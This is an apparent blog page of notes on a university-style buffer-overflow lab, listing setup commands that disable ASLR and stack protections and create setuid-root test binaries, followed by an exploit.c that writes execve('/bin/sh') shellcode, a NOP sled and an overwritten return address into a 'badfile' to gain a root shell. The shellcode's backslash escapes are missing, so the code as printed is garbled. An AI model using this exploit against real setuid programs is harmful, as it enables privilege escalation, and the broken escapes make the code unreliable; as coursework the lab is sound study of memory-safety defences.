zoukankan      html  css  js  c++  java
  • Buffer-Overflow Vulnerability Lab

    实验概述

    • Buffer overflow 定义  Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers.

    • 缓冲区溢出存在的问题 This vulnerability can be utilized by a malicious user to alter the flow control of the program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.

    实验目的

    The task is to develop a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students will be guided to walk through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain why.

    实验内容

    Task1

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -z execstack -o call_shellcode call_shellcode.c
    

    Task2

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -o stack -z execstack -fno-stack-protector stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack # chmod 4755 filename可使此程序具有root的权限
    
    gcc -o exploit exploit.c 
    

    exploit.c

    /* exploit.c  */
    
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    char shellcode[]=
        "x31xc0"             /* xorl    %eax,%eax              */
        "x50"                 /* pushl   %eax                   */
        "x68""//sh"           /* pushl   $0x68732f2f            */
        "x68""/bin"           /* pushl   $0x6e69622f            */
        "x89xe3"             /* movl    %esp,%ebx              */
        "x50"                 /* pushl   %eax                   */
        "x53"                 /* pushl   %ebx                   */
        "x89xe1"             /* movl    %esp,%ecx              */
        "x99"                 /* cdq                            */
        "xb0x0b"             /* movb    $0x0b,%al              */
        "xcdx80"             /* int     $0x80                  */
    ;
    
    void main(int argc, char **argv)
    {
        char buffer[517];
        FILE *badfile;
    
        /* Initialize buffer with 0x90 (NOP instruction) */
        memset(&buffer, 0x90, 517);
    
        /* You need to fill the buffer with appropriate contents here */
        strcpy(buffer + 100, shellcode);                    //将shellcode拷贝至buffer
        strcpy(buffer + 0x24, "x5cxebxffxbf");          //在buffer特定偏移处起始的四个字节覆盖sellcode地址
        /* Save the contents to the file "badfile" */
        badfile = fopen("./badfile", "w");
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
    }
    

    Task3

    sudo rm /bin/sh
    sudo ln -s /bin/dash /bin/sh
    
    gcc dash_shell_test.c -o dash_shell_test
    sudo chown root dash_shell_test
    sudo chmod 4755 dash_shell_test
    
    gcc -o exploit_task3 exploit_task3.c 
    

    Task4

    sudo /sbin/sysctl -w kernel.randomize_va_space=2
    
    sh task4.sh
    

    Task5

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -z execstack stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack 
    

    Task6

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -fno-stack-protector -z noexecstack stack.c
    sudo chown root stack 
    sudo chmod 4755 stack
    
  • 相关阅读:
    WCF 入门例子
    C#傻瓜日志类
    ajax长链接拉实现
    linux命令备忘
    .Net 并发异步处理总结
    grafana初始化密码(转载)
    Android 调用照相机拍照
    自定义android控件EditText 自定义边框 背景
    JSON 请求的实现过程
    [转]Android开发教程:shape和selector的结合使用
  • 原文地址:https://www.cnblogs.com/solvit/p/11970383.html
Copyright © 2011-2022 走看看